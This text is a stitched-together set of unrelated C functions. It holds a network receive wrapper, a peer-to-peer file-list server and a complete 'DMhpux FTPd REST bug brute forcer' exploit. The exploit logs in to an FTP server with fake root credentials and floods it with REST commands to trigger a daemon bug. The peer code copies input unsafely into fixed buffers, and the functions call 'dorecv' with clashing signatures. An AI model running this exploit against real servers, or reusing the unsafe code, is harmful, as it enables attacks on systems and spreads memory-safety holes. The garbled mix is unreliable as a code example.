int Network::recv(u_char* buf, int len, Address & from) { if (crypt_) { if (len > wrkbuflen_) expand_wrkbuf(len); int cc = dorecv(wrkbuf_, len, from, rsock_); if (cc!=0) { return (crypt_->Decrypt(wrkbuf_, cc, buf)); } else return 0; } return (dorecv(buf, len, from, rsock_)); }
void peerThread(void * arg){ Info *info = (Info*) arg; int newsockfd = info->sock; char port[256]; int x = savefiles(newsockfd, inet_ntoa(((struct sockaddr_in)info->addr).sin_addr), port); if(x == -1){ printf("error\n"); return; } char buffer[256]; int n; while(1){ n = dorecv(newsockfd, buffer, 256, 256); if(n == -2) { removepeer(inet_ntoa(((struct sockaddr_in)info->addr).sin_addr), port); printf("Peer Connection Terminated\n"); return; } if(n == -1){ perror("can't receive from client"); continue;} printf("SERVER GOT MESSAGE: %s n: %d\n", buffer, n); if(strcmp(buffer,"list") == 0){ sendlist(newsockfd); }else if(strncmp(buffer,"download ", 9) == 0){ //peer downloaded a file so update the list printf("removing files\n"); removepeer(inet_ntoa(((struct sockaddr_in)info->addr).sin_addr), port); printf("done removing files\n"); printf("saving files\n"); int x = savefiles(newsockfd, inet_ntoa(((struct sockaddr_in)info->addr).sin_addr), port); if(x == -1){ printf("error\n"); return; } printf("done saving files\n"); }else if(strcmp(buffer,"exit") == 0){ removepeer(inet_ntoa(((struct sockaddr_in)info->addr).sin_addr), port); printf("connection terminated\n"); break; }else{ sprintf(buffer, "unrecognized command %s", buffer); } }//end while }
int main (int argc, char *argv[]) { int sock, rc; long int i; struct sockaddr_in saddr; struct hostent *h; char buf[256]; printf("DMhpux FTPd - REST bug brute forcer\n"); printf("by phased\n"); if(argc < 2) { printf("usage: %s <host> -- simple enough?\n",argv[0]); exit(1); } h = gethostbyname(argv[1]); if(h==NULL) { printf("%s: unknown host '%s'\n",argv[0],argv[1]); exit(1); } saddr.sin_family = h->h_addrtype; memcpy((char *) &saddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); saddr.sin_port = htons(21); sock = socket(AF_INET, SOCK_STREAM, 0); if(sock<0) { perror("cannot open socket "); exit(1); } rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr)); if(rc<0) { perror("cannot connect "); exit(1); } printf("Sending false login credentials\n"); snprintf(buf, sizeof(buf), "USER root\r\n"); printf("sending %s\n", buf); rc = send(sock, buf, strlen(buf), 0); if(rc<0) { perror("cannot send data "); close(sock); exit(0); } dorecv(sock); usleep(1000); memset(buf, 0, sizeof(buf)); snprintf(buf, sizeof(buf), "PASS foo\r\n"); printf("sending %s\n", buf); rc = send(sock, buf, strlen(buf), 0); usleep(1000); dorecv(sock); dorecv(sock); for(i=1073931080;i<=1073945000;i = i+10) { snprintf(buf, sizeof(buf), "REST %d\r\n", i); printf("sending %s\n", buf); send(sock, buf, strlen(buf), 0); dorecv(sock); } return 0; }
int savefiles(int newsockfd, char* address, char* returnarray){ char buffer[256]; char file[256]; char file2[256]; char port[256]; int n; memset(buffer, 0, 256); n = dorecv(newsockfd, buffer, 256, 20); if(n < 0) return -1; printf("SERVER GOT MESSAGE: %s n: %d\n", buffer, n); sprintf(port, "%s", buffer); sprintf(returnarray, "%s", buffer); int i = 0; int count; //recv number of files in directory, malloc for that much n = dorecv(newsockfd, buffer, 256, 20); if(n < 0) return -1; count = atoi(buffer); //printf("%s %d\n", buffer, count); numfiles += count; //if list empty, malloc for root node if(peers == NULL){ peers = (struct PeerNode*)malloc(sizeof(struct PeerNode)); sprintf(peers->port, "%s", port); sprintf(peers->hostname, "%s", address); peers->files = (Filename*)malloc(count*sizeof(Filename)); peers->filesmaxsize = count; peers->filessize = 0; //receive filenames while(1){ n = dorecv(newsockfd, buffer, 256, 255); if(n < 0) break; printf("SERVER GOT MESSAGE: %s n: %d\n", buffer, n); if(buffer[0] == EOF) break; sprintf(peers->files[i].name, "%s", buffer); peers->filessize++; i++; } peers->next = NULL; peerssize++; // printf("%d\n", peerssize); // printf("out\n"); return 0; } //go to last index in list struct PeerNode* curr = peers; while(curr->next != NULL){ curr= curr->next; } curr->next = (struct PeerNode*)malloc(sizeof(struct PeerNode)); sprintf(curr->next->port, "%s", port); sprintf(curr->next->hostname, "%s", address); curr->next->files = (Filename*)malloc(count*sizeof(Filename)); curr->next->filesmaxsize = count; curr->next->filessize = 0; while(1){ n = dorecv(newsockfd, buffer, 256, 255); if(n < 0) break; printf("SERVER GOT MESSAGE: %s n: %d\n", buffer, n); if(buffer[0] == EOF) break; sprintf(curr->next->files[i].name, "%s", buffer); curr->next->filessize++; i++; } curr->next->next = NULL; peerssize++; printf("%d\n", peerssize); printf("out\n"); return 0; }